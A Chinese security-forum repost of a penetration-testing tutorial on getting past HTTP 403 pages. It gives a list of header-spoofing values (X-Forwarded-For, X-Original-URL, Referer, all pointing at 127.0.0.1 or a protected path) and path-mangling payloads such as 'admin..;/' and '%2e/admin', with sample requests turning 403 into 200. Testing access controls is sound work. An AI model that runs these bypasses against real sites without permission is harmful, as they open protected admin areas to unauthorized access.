安全矩阵

 找回密码
 立即注册
搜索
查看: 1096|回复: 0

渗透测试 -- 如何利用403页面

[复制链接]

260

主题

275

帖子

1065

积分

金牌会员

Rank: 6Rank: 6

积分
1065
发表于 2022-9-16 22:55:29 | 显示全部楼层 |阅读模式
渗透测试 -- 如何利用403页面

原文链接:渗透测试 -- 如何利用403页面
剑胆琴心 Web安全工具库  2022-09-14 00:00 发表于河南

1.端口利用
扫描主机端口,找其它开放web服务的端口,访问其端口,挑软柿子。
2.修改HOST
Host在请求头中的作用:在一般情况下,几个网站可能会部署在同一个服务器上,或者几个 web 系统共享一个服务器,通过host头来指定应该由哪个网站或者web系统来处理用户的请求。
而很多WEB应用通过获取HTTP HOST头来获得当前请求访问的位置,但是很多开发人员并未意识到HTTP HOST头由用户控制,从安全角度来讲,任何用户输入都是认为不安全的。
修改客户端请求头中的 Host 可以通过修改 Host 值修改为子域名或者ip来绕过来进行绕过二级域名;
首先对该目标域名进行子域名收集,整理好子域名资产(host字段同样支持IP地址)。先Fuzz测试跑一遍收集到的子域名,这里使用的是Burp的Intruder功能。若看到一个服务端返回200的状态码,即表面成功找到一个在HOST白名单中的子域名。我们利用firefox插件来修改HOST值,成功绕过访问限制。
3.覆盖请求 URL
尝试使用 X-Original-URL 和 X-Rewrite-URL 标头绕过 Web 服务器的限制。
通过支持 X-Original-URL 和 X-Rewrite-URL 标头,用户可以使用 X-Original-URL 或 X-Rewrite-URL HTTP 请求标头覆盖请求 URL 中的路径,尝试绕过对更高级别的缓存和 Web 服务器的限制
  1. RequestGET /auth/login HTTP/1.1ResponseHTTP/1.1 403 Forbidden
  2. ReqeustGET / HTTP/1.1X-Original-URL: /auth/loginResponseHTTP/1.1 200 OK or
  3. ReqeustGET / HTTP/1.1X-Rewrite-URL: /auth/loginResponseHTTP/1.1 200 OK
复制代码
4.Referer 标头绕过
尝试使用 Referer 标头绕过 Web 服务器的限制。
介绍:Referer 请求头包含了当前请求页面的来源页面的地址,即表示当前页面是通过此来源页面里的链接进入的。服务端一般使用 Referer 请求头识别访问来源。
  1. RequestGET /auth/login HTTP/1.1
  2. Host: xxxResponseHTTP/1.1 403 Forbidden ReqeustGET / HTTP/1.1
  3. Host: xxxReFerer:https://xxx/auth/loginResponseHTTP/1.1 200 OK or ReqeustGET /auth/login HTTP/1.1
  4. Host: xxxReFerer:https://xxx/auth/loginResponseHTTP/1.1 200 OK
复制代码
5.代理 IP
一般开发者会通过 Nginx 代理识别访问端 IP 限制对接口的访问,尝试使用 X-Forwarded-For、X-Forwared-Host 等标头绕过 Web 服务器的限制。
  1. X-Originating-IP: 127.0.0.1
  2. X-Remote-IP: 127.0.0.1
  3. X-Client-IP: 127.0.0.1
  4. X-Forwarded-For: 127.0.0.1
  5. X-Forwared-Host: 127.0.0.1
  6. X-Host: 127.0.0.1
  7. X-Custom-IP-Authorization: 127.0.0.1
复制代码
如:
  1. RequestGET /auth/login HTTP/1.1
  2. ResponseHTTP/1.1 401 Unauthorized
  3. ReqeustGET /auth/login HTTP/1.1
  4. X-Custom-IP-Authorization: 127.0.0.1
  5. ResponseHTTP/1.1 200 OK
复制代码
6.扩展名绕过
基于扩展名,用于绕过 403 受限制的目录。
  1. site.com/admin => 403
  2. site.com/admin/ => 200
  3. site.com/admin// => 200
  4. site.com//admin// => 200
  5. site.com/admin/* => 200
  6. site.com/admin/*/ => 200
  7. site.com/admin/. => 200
  8. site.com/admin/./ => 200
  9. site.com/./admin/./ => 200
  10. site.com/admin/./. => 200
  11. site.com/admin/./. => 200
  12. site.com/admin? => 200
  13. site.com/admin?? => 200
  14. site.com/admin??? => 200
  15. site.com/admin..;/ => 200
  16. site.com/admin/..;/ => 200
  17. site.com/%2f/admin => 200
  18. site.com/%2e/admin => 200
  19. site.com/admin%20/ => 200
  20. site.com/admin%09/ => 200
  21. site.com/%20admin%20/ => 200
复制代码
7.扫描的时候
遇到 403 了,上目录扫描工具,扫目录,扫文件(记住,扫描的时候要打开探测403,因为有些网站的目录没有权限访问会显示403,但是在这个目录下面的文件,我们或许能扫描到并访问


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-29 11:44 , Processed in 0.012248 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表